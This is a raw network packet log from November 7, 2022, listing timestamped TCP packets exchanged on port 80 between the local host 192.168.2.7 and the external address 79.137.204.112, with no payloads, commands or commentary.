Nov 7, 2022 23:48:47.638732910 CET	80	49711	79.137.204.112	192.168.2.7
Nov 7, 2022 23:48:47.638745070 CET	80	49711	79.137.204.112	192.168.2.7
Nov 7, 2022 23:48:47.638756037 CET	80	49711	79.137.204.112	192.168.2.7
Nov 7, 2022 23:48:47.638768911 CET	80	49711	79.137.204.112	192.168.2.7
Nov 7, 2022 23:48:47.638780117 CET	80	49711	79.137.204.112	192.168.2.7
Nov 7, 2022 23:48:47.638837099 CET	80	49711	79.137.204.112	192.168.2.7
Nov 7, 2022 23:48:47.638849020 CET	80	49711	79.137.204.112	192.168.2.7
Nov 7, 2022 23:48:47.638885021 CET	80	49711	79.137.204.112	192.168.2.7
Nov 7, 2022 23:48:47.638897896 CET	80	49711	79.137.204.112	192.168.2.7
Nov 7, 2022 23:48:47.638943911 CET	80	49711	79.137.204.112	192.168.2.7
Nov 7, 2022 23:48:47.638956070 CET	80	49711	79.137.204.112	192.168.2.7
Nov 7, 2022 23:48:47.638967991 CET	80	49711	79.137.204.112	192.168.2.7
Nov 7, 2022 23:48:47.639014959 CET	80	49711	79.137.204.112	192.168.2.7
Nov 7, 2022 23:48:47.639028072 CET	80	49711	79.137.204.112	192.168.2.7
Nov 7, 2022 23:48:47.639039993 CET	80	49711	79.137.204.112	192.168.2.7
Nov 7, 2022 23:48:48.975112915 CET	49711	80	192.168.2.7	79.137.204.112
Nov 7, 2022 23:48:48.975224972 CET	49711	80	192.168.2.7	79.137.204.112
Nov 7, 2022 23:48:48.976535082 CET	49711	80	192.168.2.7	79.137.204.112
Nov 7, 2022 23:48:48.976731062 CET	49711	80	192.168.2.7	79.137.204.112
Nov 7, 2022 23:48:49.004741907 CET	80	49711	79.137.204.112	192.168.2.7
Nov 7, 2022 23:48:49.004779100 CET	80	49711	79.137.204.112	192.168.2.7
Nov 7, 2022 23:48:49.004798889 CET	80	49711	79.137.204.112	192.168.2.7
Nov 7, 2022 23:48:49.004816055 CET	80	49711	79.137.204.112	192.168.2.7
Nov 7, 2022 23:48:49.004829884 CET	80	49711	79.137.204.112	192.168.2.7
Nov 7, 2022 23:48:49.004846096 CET	80	49711	79.137.204.112	192.168.2.7
Nov 7, 2022 23:48:49.004863977 CET	80	49711	79.137.204.112	192.168.2.7
Nov 7, 2022 23:48:49.004879951 CET	80	49711	79.137.204.112	192.168.2.7
Nov 7, 2022 23:48:49.004895926 CET	80	49711	79.137.204.112	192.168.2.7
Nov 7, 2022 23:48:49.004910946 CET	80	49711	79.137.204.112	192.168.2.7
Nov 7, 2022 23:48:49.004926920 CET	80	49711	79.137.204.112	192.168.2.7
Nov 7, 2022 23:48:49.004961967 CET	80	49711	79.137.204.112	192.168.2.7
Nov 7, 2022 23:48:49.004978895 CET	80	49711	79.137.204.112	192.168.2.7
Nov 7, 2022 23:48:49.004991055 CET	80	49711	79.137.204.112	192.168.2.7
Nov 7, 2022 23:48:49.005002975 CET	80	49711	79.137.204.112	192.168.2.7
Nov 7, 2022 23:48:49.005031109 CET	80	49711	79.137.204.112	192.168.2.7
Nov 7, 2022 23:48:49.005043030 CET	80	49711	79.137.204.112	192.168.2.7
Nov 7, 2022 23:48:49.005053997 CET	80	49711	79.137.204.112	192.168.2.7
Nov 7, 2022 23:48:49.005100012 CET	80	49711	79.137.204.112	192.168.2.7
Nov 7, 2022 23:48:49.005111933 CET	80	49711	79.137.204.112	192.168.2.7
Nov 7, 2022 23:48:49.005124092 CET	80	49711	79.137.204.112	192.168.2.7
Nov 7, 2022 23:48:49.005135059 CET	80	49711	79.137.204.112	192.168.2.7
Nov 7, 2022 23:48:49.005146980 CET	80	49711	79.137.204.112	192.168.2.7
Nov 7, 2022 23:48:49.005167007 CET	80	49711	79.137.204.112	192.168.2.7
Nov 7, 2022 23:48:49.005179882 CET	80	49711	79.137.204.112	192.168.2.7
Nov 7, 2022 23:48:49.005264044 CET	80	49711	79.137.204.112	192.168.2.7
Nov 7, 2022 23:48:49.005283117 CET	80	49711	79.137.204.112	192.168.2.7
Nov 7, 2022 23:48:49.005297899 CET	80	49711	79.137.204.112	192.168.2.7
Nov 7, 2022 23:48:49.005315065 CET	80	49711	79.137.204.112	192.168.2.7
Nov 7, 2022 23:48:49.005331993 CET	80	49711	79.137.204.112	192.168.2.7
Nov 7, 2022 23:48:49.005347013 CET	80	49711	79.137.204.112	192.168.2.7
Nov 7, 2022 23:48:49.005362988 CET	80	49711	79.137.204.112	192.168.2.7
Nov 7, 2022 23:48:49.005378008 CET	80	49711	79.137.204.112	192.168.2.7
Nov 7, 2022 23:48:49.005533934 CET	80	49711	79.137.204.112	192.168.2.7
Nov 7, 2022 23:48:49.005557060 CET	80	49711	79.137.204.112	192.168.2.7
Nov 7, 2022 23:48:49.005575895 CET	80	49711	79.137.204.112	192.168.2.7
Nov 7, 2022 23:48:49.005594015 CET	80	49711	79.137.204.112	192.168.2.7
Nov 7, 2022 23:48:49.005614996 CET	80	49711	79.137.204.112	192.168.2.7
Nov 7, 2022 23:48:49.005630970 CET	80	49711	79.137.204.112	192.168.2.7
Nov 7, 2022 23:48:49.005647898 CET	80	49711	79.137.204.112	192.168.2.7
Nov 7, 2022 23:48:49.005662918 CET	80	49711	79.137.204.112	192.168.2.7
Nov 7, 2022 23:48:49.005681038 CET	80	49711	79.137.204.112	192.168.2.7
Nov 7, 2022 23:48:49.005928040 CET	80	49711	79.137.204.112	192.168.2.7
Nov 7, 2022 23:48:49.005950928 CET	80	49711	79.137.204.112	192.168.2.7
Nov 7, 2022 23:48:49.005966902 CET	80	49711	79.137.204.112	192.168.2.7
Nov 7, 2022 23:48:49.005984068 CET	80	49711	79.137.204.112	192.168.2.7
Nov 7, 2022 23:48:49.006000042 CET	80	49711	79.137.204.112	192.168.2.7
Nov 7, 2022 23:48:49.006016016 CET	80	49711	79.137.204.112	192.168.2.7
Nov 7, 2022 23:48:49.006041050 CET	80	49711	79.137.204.112	192.168.2.7
Nov 7, 2022 23:48:49.006058931 CET	80	49711	79.137.204.112	192.168.2.7
Nov 7, 2022 23:48:49.006074905 CET	80	49711	79.137.204.112	192.168.2.7
Nov 7, 2022 23:48:49.006091118 CET	80	49711	79.137.204.112	192.168.2.7
Nov 7, 2022 23:48:49.006108999 CET	80	49711	79.137.204.112	192.168.2.7
Nov 7, 2022 23:48:49.006125927 CET	80	49711	79.137.204.112	192.168.2.7
Nov 7, 2022 23:48:49.006144047 CET	80	49711	79.137.204.112	192.168.2.7
Nov 7, 2022 23:48:49.006160021 CET	80	49711	79.137.204.112	192.168.2.7
Nov 7, 2022 23:48:49.006192923 CET	80	49711	79.137.204.112	192.168.2.7
Nov 7, 2022 23:48:49.006211042 CET	80	49711	79.137.204.112	192.168.2.7
Nov 7, 2022 23:48:49.006227970 CET	80	49711	79.137.204.112	192.168.2.7
Nov 7, 2022 23:48:49.006244898 CET	80	49711	79.137.204.112	192.168.2.7
Nov 7, 2022 23:48:49.006259918 CET	80	49711	79.137.204.112	192.168.2.7
Nov 7, 2022 23:48:49.006315947 CET	80	49711	79.137.204.112	192.168.2.7
Nov 7, 2022 23:48:49.006333113 CET	80	49711	79.137.204.112	192.168.2.7
Nov 7, 2022 23:48:49.006350040 CET	80	49711	79.137.204.112	192.168.2.7
Nov 7, 2022 23:48:49.006367922 CET	80	49711	79.137.204.112	192.168.2.7
Nov 7, 2022 23:48:49.006388903 CET	80	49711	79.137.204.112	192.168.2.7
Nov 7, 2022 23:48:49.006407022 CET	80	49711	79.137.204.112	192.168.2.7
Nov 7, 2022 23:48:49.006423950 CET	80	49711	79.137.204.112	192.168.2.7
Nov 7, 2022 23:48:49.006441116 CET	80	49711	79.137.204.112	192.168.2.7
Nov 7, 2022 23:48:49.006458044 CET	80	49711	79.137.204.112	192.168.2.7
Nov 7, 2022 23:48:49.006483078 CET	80	49711	79.137.204.112	192.168.2.7
Nov 7, 2022 23:48:49.006500959 CET	80	49711	79.137.204.112	192.168.2.7
Nov 7, 2022 23:48:49.006515980 CET	80	49711	79.137.204.112	192.168.2.7
Nov 7, 2022 23:48:49.006532907 CET	80	49711	79.137.204.112	192.168.2.7
Nov 7, 2022 23:48:49.006547928 CET	80	49711	79.137.204.112	192.168.2.7
Nov 7, 2022 23:48:49.006650925 CET	80	49711	79.137.204.112	192.168.2.7
Nov 7, 2022 23:48:49.006675005 CET	80	49711	79.137.204.112	192.168.2.7
Nov 7, 2022 23:48:49.006691933 CET	80	49711	79.137.204.112	192.168.2.7
Nov 7, 2022 23:48:49.006706953 CET	80	49711	79.137.204.112	192.168.2.7
Nov 7, 2022 23:48:49.006724119 CET	80	49711	79.137.204.112	192.168.2.7
Nov 7, 2022 23:48:49.006741047 CET	80	49711	79.137.204.112	192.168.2.7
Nov 7, 2022 23:48:49.006757021 CET	80	49711	79.137.204.112	192.168.2.7
Nov 7, 2022 23:48:49.006772995 CET	80	49711	79.137.204.112	192.168.2.7
Nov 7, 2022 23:48:49.006788969 CET	80	49711	79.137.204.112	192.168.2.7
Nov 7, 2022 23:48:49.006803989 CET	80	49711	79.137.204.112	192.168.2.7
Nov 7, 2022 23:48:49.006819010 CET	80	49711	79.137.204.112	192.168.2.7
Nov 7, 2022 23:48:49.006833076 CET	80	49711	79.137.204.112	192.168.2.7
Nov 7, 2022 23:48:49.006848097 CET	80	49711	79.137.204.112	192.168.2.7
Nov 7, 2022 23:48:49.006864071 CET	80	49711	79.137.204.112	192.168.2.7
Nov 7, 2022 23:48:49.006922960 CET	80	49711	79.137.204.112	192.168.2.7
Nov 7, 2022 23:48:49.006938934 CET	80	49711	79.137.204.112	192.168.2.7
Nov 7, 2022 23:48:49.006956100 CET	80	49711	79.137.204.112	192.168.2.7
Nov 7, 2022 23:48:49.006972075 CET	80	49711	79.137.204.112	192.168.2.7
Nov 7, 2022 23:48:49.006989956 CET	80	49711	79.137.204.112	192.168.2.7
Nov 7, 2022 23:48:49.006999969 CET	80	49711	79.137.204.112	192.168.2.7
Nov 7, 2022 23:48:49.007011890 CET	80	49711	79.137.204.112	192.168.2.7
Nov 7, 2022 23:48:49.010462046 CET	49711	80	192.168.2.7	79.137.204.112
Nov 7, 2022 23:48:49.010683060 CET	49711	80	192.168.2.7	79.137.204.112
Nov 7, 2022 23:48:49.010683060 CET	49711	80	192.168.2.7	79.137.204.112
Nov 7, 2022 23:48:49.010807037 CET	49711	80	192.168.2.7	79.137.204.112
Nov 7, 2022 23:48:49.010932922 CET	49711	80	192.168.2.7	79.137.204.112
Nov 7, 2022 23:48:49.040436983 CET	80	49711	79.137.204.112	192.168.2.7
Nov 7, 2022 23:48:49.040518045 CET	80	49711	79.137.204.112	192.168.2.7
Nov 7, 2022 23:48:49.040625095 CET	80	49711	79.137.204.112	192.168.2.7
Nov 7, 2022 23:48:49.040663004 CET	80	49711	79.137.204.112	192.168.2.7
Nov 7, 2022 23:48:49.040710926 CET	80	49711	79.137.204.112	192.168.2.7
Nov 7, 2022 23:48:49.040838957 CET	80	49711	79.137.204.112	192.168.2.7
Nov 7, 2022 23:48:49.040868998 CET	80	49711	79.137.204.112	192.168.2.7
Nov 7, 2022 23:48:49.040891886 CET	80	49711	79.137.204.112	192.168.2.7
Nov 7, 2022 23:48:49.040910006 CET	80	49711	79.137.204.112	192.168.2.7
Nov 7, 2022 23:48:49.040930033 CET	80	49711	79.137.204.112	192.168.2.7
Nov 7, 2022 23:48:49.040947914 CET	80	49711	79.137.204.112	192.168.2.7
Nov 7, 2022 23:48:49.040967941 CET	80	49711	79.137.204.112	192.168.2.7
Nov 7, 2022 23:48:49.041071892 CET	80	49711	79.137.204.112	192.168.2.7
Nov 7, 2022 23:48:49.041207075 CET	80	49711	79.137.204.112	192.168.2.7
Nov 7, 2022 23:48:49.041269064 CET	80	49711	79.137.204.112	192.168.2.7
Nov 7, 2022 23:48:49.041332960 CET	80	49711	79.137.204.112	192.168.2.7
Nov 7, 2022 23:48:49.041629076 CET	80	49711	79.137.204.112	192.168.2.7
Nov 7, 2022 23:48:49.041788101 CET	80	49711	79.137.204.112	192.168.2.7
Nov 7, 2022 23:48:49.041913986 CET	80	49711	79.137.204.112	192.168.2.7
Nov 7, 2022 23:48:49.041943073 CET	80	49711	79.137.204.112	192.168.2.7
Nov 7, 2022 23:48:49.041963100 CET	80	49711	79.137.204.112	192.168.2.7
Nov 7, 2022 23:48:49.042006969 CET	80	49711	79.137.204.112	192.168.2.7
Nov 7, 2022 23:48:49.042035103 CET	80	49711	79.137.204.112	192.168.2.7
Nov 7, 2022 23:48:49.042062998 CET	80	49711	79.137.204.112	192.168.2.7
Nov 7, 2022 23:48:49.042089939 CET	80	49711	79.137.204.112	192.168.2.7
Nov 7, 2022 23:48:49.042118073 CET	80	49711	79.137.204.112	192.168.2.7
Nov 7, 2022 23:48:49.042146921 CET	80	49711	79.137.204.112	192.168.2.7
Nov 7, 2022 23:48:49.042172909 CET	80	49711	79.137.204.112	192.168.2.7
Nov 7, 2022 23:48:49.042198896 CET	80	49711	79.137.204.112	192.168.2.7
Nov 7, 2022 23:48:49.042228937 CET	80	49711	79.137.204.112	192.168.2.7
Nov 7, 2022 23:48:49.042256117 CET	80	49711	79.137.204.112	192.168.2.7
Nov 7, 2022 23:48:49.042284966 CET	80	49711	79.137.204.112	192.168.2.7
Nov 7, 2022 23:48:49.042313099 CET	80	49711	79.137.204.112	192.168.2.7
Nov 7, 2022 23:48:49.042340040 CET	80	49711	79.137.204.112	192.168.2.7
Nov 7, 2022 23:48:49.042368889 CET	80	49711	79.137.204.112	192.168.2.7
Nov 7, 2022 23:48:49.042396069 CET	80	49711	79.137.204.112	192.168.2.7
Nov 7, 2022 23:48:49.042423010 CET	80	49711	79.137.204.112	192.168.2.7
Nov 7, 2022 23:48:49.042450905 CET	80	49711	79.137.204.112	192.168.2.7
Nov 7, 2022 23:48:49.042495966 CET	80	49711	79.137.204.112	192.168.2.7
Nov 7, 2022 23:48:49.042522907 CET	80	49711	79.137.204.112	192.168.2.7
Nov 7, 2022 23:48:49.042551041 CET	80	49711	79.137.204.112	192.168.2.7
Nov 7, 2022 23:48:49.042579889 CET	80	49711	79.137.204.112	192.168.2.7
Nov 7, 2022 23:48:49.042613029 CET	80	49711	79.137.204.112	192.168.2.7
Nov 7, 2022 23:48:49.042644024 CET	80	49711	79.137.204.112	192.168.2.7
Nov 7, 2022 23:48:49.042670965 CET	80	49711	79.137.204.112	192.168.2.7
Nov 7, 2022 23:48:49.042700052 CET	80	49711	79.137.204.112	192.168.2.7
Nov 7, 2022 23:48:49.042726040 CET	80	49711	79.137.204.112	192.168.2.7
Nov 7, 2022 23:48:49.042753935 CET	80	49711	79.137.204.112	192.168.2.7
Nov 7, 2022 23:48:49.042779922 CET	80	49711	79.137.204.112	192.168.2.7
Nov 7, 2022 23:48:49.042807102 CET	80	49711	79.137.204.112	192.168.2.7
Nov 7, 2022 23:48:49.042834997 CET	80	49711	79.137.204.112	192.168.2.7
Nov 7, 2022 23:48:49.042861938 CET	80	49711	79.137.204.112	192.168.2.7
Nov 7, 2022 23:48:49.042926073 CET	80	49711	79.137.204.112	192.168.2.7
Nov 7, 2022 23:48:49.042953968 CET	80	49711	79.137.204.112	192.168.2.7
Nov 7, 2022 23:48:49.042980909 CET	80	49711	79.137.204.112	192.168.2.7
Nov 7, 2022 23:48:49.043008089 CET	80	49711	79.137.204.112	192.168.2.7
Nov 7, 2022 23:48:49.043035984 CET	80	49711	79.137.204.112	192.168.2.7
Nov 7, 2022 23:48:49.043062925 CET	80	49711	79.137.204.112	192.168.2.7
Nov 7, 2022 23:48:49.043092012 CET	80	49711	79.137.204.112	192.168.2.7
Nov 7, 2022 23:48:49.043122053 CET	80	49711	79.137.204.112	192.168.2.7
Nov 7, 2022 23:48:49.043148041 CET	80	49711	79.137.204.112	192.168.2.7
Nov 7, 2022 23:48:49.043174982 CET	80	49711	79.137.204.112	192.168.2.7
Nov 7, 2022 23:48:49.043188095 CET	49711	80	192.168.2.7	79.137.204.112
Nov 7, 2022 23:48:49.043201923 CET	80	49711	79.137.204.112	192.168.2.7
Nov 7, 2022 23:48:49.043231964 CET	80	49711	79.137.204.112	192.168.2.7
Nov 7, 2022 23:48:49.043261051 CET	80	49711	79.137.204.112	192.168.2.7
Nov 7, 2022 23:48:49.043288946 CET	80	49711	79.137.204.112	192.168.2.7
Nov 7, 2022 23:48:49.043318987 CET	80	49711	79.137.204.112	192.168.2.7
Nov 7, 2022 23:48:49.043319941 CET	49711	80	192.168.2.7	79.137.204.112
Nov 7, 2022 23:48:49.043348074 CET	80	49711	79.137.204.112	192.168.2.7
Nov 7, 2022 23:48:49.043375969 CET	80	49711	79.137.204.112	192.168.2.7
Nov 7, 2022 23:48:49.043404102 CET	80	49711	79.137.204.112	192.168.2.7
Nov 7, 2022 23:48:49.043431997 CET	80	49711	79.137.204.112	192.168.2.7
Nov 7, 2022 23:48:49.043457985 CET	80	49711	79.137.204.112	192.168.2.7
Nov 7, 2022 23:48:49.043484926 CET	80	49711	79.137.204.112	192.168.2.7
Nov 7, 2022 23:48:49.043512106 CET	80	49711	79.137.204.112	192.168.2.7
Nov 7, 2022 23:48:49.043539047 CET	80	49711	79.137.204.112	192.168.2.7
Nov 7, 2022 23:48:49.043570042 CET	80	49711	79.137.204.112	192.168.2.7
Nov 7, 2022 23:48:49.043596029 CET	80	49711	79.137.204.112	192.168.2.7
Nov 7, 2022 23:48:49.043627024 CET	80	49711	79.137.204.112	192.168.2.7
Nov 7, 2022 23:48:49.043654919 CET	80	49711	79.137.204.112	192.168.2.7
Nov 7, 2022 23:48:49.043680906 CET	80	49711	79.137.204.112	192.168.2.7
Nov 7, 2022 23:48:49.043708086 CET	80	49711	79.137.204.112	192.168.2.7
Nov 7, 2022 23:48:49.043736935 CET	80	49711	79.137.204.112	192.168.2.7
Nov 7, 2022 23:48:49.043764114 CET	80	49711	79.137.204.112	192.168.2.7
Nov 7, 2022 23:48:49.043792009 CET	80	49711	79.137.204.112	192.168.2.7
Nov 7, 2022 23:48:49.043818951 CET	80	49711	79.137.204.112	192.168.2.7
Nov 7, 2022 23:48:49.043847084 CET	80	49711	79.137.204.112	192.168.2.7
Nov 7, 2022 23:48:49.043875933 CET	80	49711	79.137.204.112	192.168.2.7
Nov 7, 2022 23:48:49.043903112 CET	80	49711	79.137.204.112	192.168.2.7
Nov 7, 2022 23:48:49.043930054 CET	80	49711	79.137.204.112	192.168.2.7
Nov 7, 2022 23:48:49.043957949 CET	80	49711	79.137.204.112	192.168.2.7
Nov 7, 2022 23:48:49.044532061 CET	49711	80	192.168.2.7	79.137.204.112
Nov 7, 2022 23:48:49.044631958 CET	49711	80	192.168.2.7	79.137.204.112
Nov 7, 2022 23:48:49.073398113 CET	80	49711	79.137.204.112	192.168.2.7
Nov 7, 2022 23:48:49.073424101 CET	80	49711	79.137.204.112	192.168.2.7
Nov 7, 2022 23:48:49.073441982 CET	80	49711	79.137.204.112	192.168.2.7
Nov 7, 2022 23:48:49.073456049 CET	80	49711	79.137.204.112	192.168.2.7
Nov 7, 2022 23:48:49.073467970 CET	80	49711	79.137.204.112	192.168.2.7
Nov 7, 2022 23:48:49.073479891 CET	80	49711	79.137.204.112	192.168.2.7
Nov 7, 2022 23:48:49.073492050 CET	80	49711	79.137.204.112	192.168.2.7
Nov 7, 2022 23:48:49.073538065 CET	80	49711	79.137.204.112	192.168.2.7
Nov 7, 2022 23:48:49.073549986 CET	80	49711	79.137.204.112	192.168.2.7
Nov 7, 2022 23:48:49.073612928 CET	80	49711	79.137.204.112	192.168.2.7
Nov 7, 2022 23:48:49.073626041 CET	80	49711	79.137.204.112	192.168.2.7
Nov 7, 2022 23:48:49.073693037 CET	80	49711	79.137.204.112	192.168.2.7
Nov 7, 2022 23:48:49.073721886 CET	80	49711	79.137.204.112	192.168.2.7
Nov 7, 2022 23:48:49.073826075 CET	80	49711	79.137.204.112	192.168.2.7
Nov 7, 2022 23:48:49.073838949 CET	80	49711	79.137.204.112	192.168.2.7
Nov 7, 2022 23:48:49.073852062 CET	80	49711	79.137.204.112	192.168.2.7
Nov 7, 2022 23:48:49.073895931 CET	80	49711	79.137.204.112	192.168.2.7
Nov 7, 2022 23:48:49.073920012 CET	80	49711	79.137.204.112	192.168.2.7
Nov 7, 2022 23:48:49.073970079 CET	80	49711	79.137.204.112	192.168.2.7
Nov 7, 2022 23:48:49.074089050 CET	80	49711	79.137.204.112	192.168.2.7
Nov 7, 2022 23:48:49.074107885 CET	80	49711	79.137.204.112	192.168.2.7
Nov 7, 2022 23:48:49.074142933 CET	80	49711	79.137.204.112	192.168.2.7
Nov 7, 2022 23:48:49.074208975 CET	80	49711	79.137.204.112	192.168.2.7
Nov 7, 2022 23:48:49.074291945 CET	80	49711	79.137.204.112	192.168.2.7
Nov 7, 2022 23:48:49.074327946 CET	80	49711	79.137.204.112	192.168.2.7
Nov 7, 2022 23:48:49.074510098 CET	80	49711	79.137.204.112	192.168.2.7
Nov 7, 2022 23:48:49.074526072 CET	80	49711	79.137.204.112	192.168.2.7
Nov 7, 2022 23:48:49.074538946 CET	80	49711	79.137.204.112	192.168.2.7
Nov 7, 2022 23:48:49.074552059 CET	80	49711	79.137.204.112	192.168.2.7
Nov 7, 2022 23:48:49.074565887 CET	80	49711	79.137.204.112	192.168.2.7
Nov 7, 2022 23:48:49.074579000 CET	80	49711	79.137.204.112	192.168.2.7
Nov 7, 2022 23:48:49.074593067 CET	80	49711	79.137.204.112	192.168.2.7
Nov 7, 2022 23:48:49.074732065 CET	80	49711	79.137.204.112	192.168.2.7
Nov 7, 2022 23:48:49.074780941 CET	80	49711	79.137.204.112	192.168.2.7
Nov 7, 2022 23:48:49.074794054 CET	80	49711	79.137.204.112	192.168.2.7
Nov 7, 2022 23:48:49.074805975 CET	80	49711	79.137.204.112	192.168.2.7
Nov 7, 2022 23:48:49.074901104 CET	80	49711	79.137.204.112	192.168.2.7
Nov 7, 2022 23:48:49.074918032 CET	80	49711	79.137.204.112	192.168.2.7
Nov 7, 2022 23:48:49.074975967 CET	80	49711	79.137.204.112	192.168.2.7
Nov 7, 2022 23:48:49.075015068 CET	80	49711	79.137.204.112	192.168.2.7
Nov 7, 2022 23:48:49.075092077 CET	80	49711	79.137.204.112	192.168.2.7
Nov 7, 2022 23:48:49.075125933 CET	80	49711	79.137.204.112	192.168.2.7
Nov 7, 2022 23:48:49.075182915 CET	80	49711	79.137.204.112	192.168.2.7
Nov 7, 2022 23:48:49.075249910 CET	80	49711	79.137.204.112	192.168.2.7
Nov 7, 2022 23:48:49.075264931 CET	80	49711	79.137.204.112	192.168.2.7
Nov 7, 2022 23:48:49.075278044 CET	80	49711	79.137.204.112	192.168.2.7
Nov 7, 2022 23:48:49.075330019 CET	80	49711	79.137.204.112	192.168.2.7
Nov 7, 2022 23:48:49.075344086 CET	80	49711	79.137.204.112	192.168.2.7
Nov 7, 2022 23:48:49.075401068 CET	80	49711	79.137.204.112	192.168.2.7
Nov 7, 2022 23:48:49.075510025 CET	80	49711	79.137.204.112	192.168.2.7
Nov 7, 2022 23:48:49.075522900 CET	80	49711	79.137.204.112	192.168.2.7
Nov 7, 2022 23:48:49.075536013 CET	80	49711	79.137.204.112	192.168.2.7
Nov 7, 2022 23:48:49.075608015 CET	80	49711	79.137.204.112	192.168.2.7
Nov 7, 2022 23:48:49.075648069 CET	80	49711	79.137.204.112	192.168.2.7
Nov 7, 2022 23:48:49.075692892 CET	80	49711	79.137.204.112	192.168.2.7
Nov 7, 2022 23:48:49.075767994 CET	80	49711	79.137.204.112	192.168.2.7
Nov 7, 2022 23:48:49.075781107 CET	80	49711	79.137.204.112	192.168.2.7
Nov 7, 2022 23:48:49.075793028 CET	80	49711	79.137.204.112	192.168.2.7
Nov 7, 2022 23:48:49.075845957 CET	80	49711	79.137.204.112	192.168.2.7
Nov 7, 2022 23:48:49.075932980 CET	80	49711	79.137.204.112	192.168.2.7
Nov 7, 2022 23:48:49.075946093 CET	80	49711	79.137.204.112	192.168.2.7
Nov 7, 2022 23:48:49.076004028 CET	80	49711	79.137.204.112	192.168.2.7
Nov 7, 2022 23:48:49.076024055 CET	49711	80	192.168.2.7	79.137.204.112
Nov 7, 2022 23:48:49.076036930 CET	80	49711	79.137.204.112	192.168.2.7
Nov 7, 2022 23:48:49.076086044 CET	80	49711	79.137.204.112	192.168.2.7
Nov 7, 2022 23:48:49.076121092 CET	80	49711	79.137.204.112	192.168.2.7
Nov 7, 2022 23:48:49.076160908 CET	80	49711	79.137.204.112	192.168.2.7
Nov 7, 2022 23:48:49.076217890 CET	49711	80	192.168.2.7	79.137.204.112
Nov 7, 2022 23:48:49.076289892 CET	80	49711	79.137.204.112	192.168.2.7
Nov 7, 2022 23:48:49.076303005 CET	80	49711	79.137.204.112	192.168.2.7
Nov 7, 2022 23:48:49.076317072 CET	80	49711	79.137.204.112	192.168.2.7
Nov 7, 2022 23:48:49.076330900 CET	80	49711	79.137.204.112	192.168.2.7
Nov 7, 2022 23:48:49.076407909 CET	80	49711	79.137.204.112	192.168.2.7
Nov 7, 2022 23:48:49.076420069 CET	80	49711	79.137.204.112	192.168.2.7
Nov 7, 2022 23:48:49.076476097 CET	80	49711	79.137.204.112	192.168.2.7
Nov 7, 2022 23:48:49.076572895 CET	80	49711	79.137.204.112	192.168.2.7
Nov 7, 2022 23:48:49.076586008 CET	80	49711	79.137.204.112	192.168.2.7
Nov 7, 2022 23:48:49.076626062 CET	80	49711	79.137.204.112	192.168.2.7
Nov 7, 2022 23:48:49.076684952 CET	80	49711	79.137.204.112	192.168.2.7
Nov 7, 2022 23:48:49.076761961 CET	80	49711	79.137.204.112	192.168.2.7
Nov 7, 2022 23:48:49.076776028 CET	80	49711	79.137.204.112	192.168.2.7
Nov 7, 2022 23:48:49.076828957 CET	80	49711	79.137.204.112	192.168.2.7
Nov 7, 2022 23:48:49.076841116 CET	80	49711	79.137.204.112	192.168.2.7
Nov 7, 2022 23:48:49.076854944 CET	80	49711	79.137.204.112	192.168.2.7
Nov 7, 2022 23:48:49.076929092 CET	80	49711	79.137.204.112	192.168.2.7
Nov 7, 2022 23:48:49.076963902 CET	80	49711	79.137.204.112	192.168.2.7
Nov 7, 2022 23:48:49.077056885 CET	80	49711	79.137.204.112	192.168.2.7
Nov 7, 2022 23:48:49.077069998 CET	80	49711	79.137.204.112	192.168.2.7
Nov 7, 2022 23:48:49.077119112 CET	80	49711	79.137.204.112	192.168.2.7
Nov 7, 2022 23:48:49.077173948 CET	80	49711	79.137.204.112	192.168.2.7
Nov 7, 2022 23:48:49.077263117 CET	80	49711	79.137.204.112	192.168.2.7
Nov 7, 2022 23:48:49.077275991 CET	80	49711	79.137.204.112	192.168.2.7
Nov 7, 2022 23:48:49.077332020 CET	80	49711	79.137.204.112	192.168.2.7
Nov 7, 2022 23:48:49.077343941 CET	80	49711	79.137.204.112	192.168.2.7
Nov 7, 2022 23:48:49.077399015 CET	80	49711	79.137.204.112	192.168.2.7
Nov 7, 2022 23:48:49.077452898 CET	80	49711	79.137.204.112	192.168.2.7
Nov 7, 2022 23:48:49.077488899 CET	80	49711	79.137.204.112	192.168.2.7
Nov 7, 2022 23:48:49.077562094 CET	80	49711	79.137.204.112	192.168.2.7
Nov 7, 2022 23:48:49.077595949 CET	80	49711	79.137.204.112	192.168.2.7
Nov 7, 2022 23:48:49.077631950 CET	80	49711	79.137.204.112	192.168.2.7
Nov 7, 2022 23:48:49.077665091 CET	80	49711	79.137.204.112	192.168.2.7
Nov 7, 2022 23:48:49.077677965 CET	80	49711	79.137.204.112	192.168.2.7
Nov 7, 2022 23:48:49.077691078 CET	80	49711	79.137.204.112	192.168.2.7
Nov 7, 2022 23:48:49.080163002 CET	49711	80	192.168.2.7	79.137.204.112
Nov 7, 2022 23:48:49.080300093 CET	49711	80	192.168.2.7	79.137.204.112
Nov 7, 2022 23:48:49.105581999 CET	80	49711	79.137.204.112	192.168.2.7
Nov 7, 2022 23:48:49.105614901 CET	80	49711	79.137.204.112	192.168.2.7
Nov 7, 2022 23:48:49.105628967 CET	80	49711	79.137.204.112	192.168.2.7
Nov 7, 2022 23:48:49.105642080 CET	80	49711	79.137.204.112	192.168.2.7
Nov 7, 2022 23:48:49.105662107 CET	80	49711	79.137.204.112	192.168.2.7
Nov 7, 2022 23:48:49.105674028 CET	80	49711	79.137.204.112	192.168.2.7
Nov 7, 2022 23:48:49.105685949 CET	80	49711	79.137.204.112	192.168.2.7
Nov 7, 2022 23:48:49.105698109 CET	80	49711	79.137.204.112	192.168.2.7
Nov 7, 2022 23:48:49.105710030 CET	80	49711	79.137.204.112	192.168.2.7
Nov 7, 2022 23:48:49.105722904 CET	80	49711	79.137.204.112	192.168.2.7
Nov 7, 2022 23:48:49.105734110 CET	80	49711	79.137.204.112	192.168.2.7
Nov 7, 2022 23:48:49.105763912 CET	80	49711	79.137.204.112	192.168.2.7
Nov 7, 2022 23:48:49.105875969 CET	80	49711	79.137.204.112	192.168.2.7
Nov 7, 2022 23:48:49.105892897 CET	80	49711	79.137.204.112	192.168.2.7
Nov 7, 2022 23:48:49.105905056 CET	80	49711	79.137.204.112	192.168.2.7
Nov 7, 2022 23:48:49.105917931 CET	80	49711	79.137.204.112	192.168.2.7
Nov 7, 2022 23:48:49.105932951 CET	80	49711	79.137.204.112	192.168.2.7
Nov 7, 2022 23:48:49.105951071 CET	80	49711	79.137.204.112	192.168.2.7
Nov 7, 2022 23:48:49.106024027 CET	80	49711	79.137.204.112	192.168.2.7
Nov 7, 2022 23:48:49.106038094 CET	80	49711	79.137.204.112	192.168.2.7
Nov 7, 2022 23:48:49.106178045 CET	80	49711	79.137.204.112	192.168.2.7
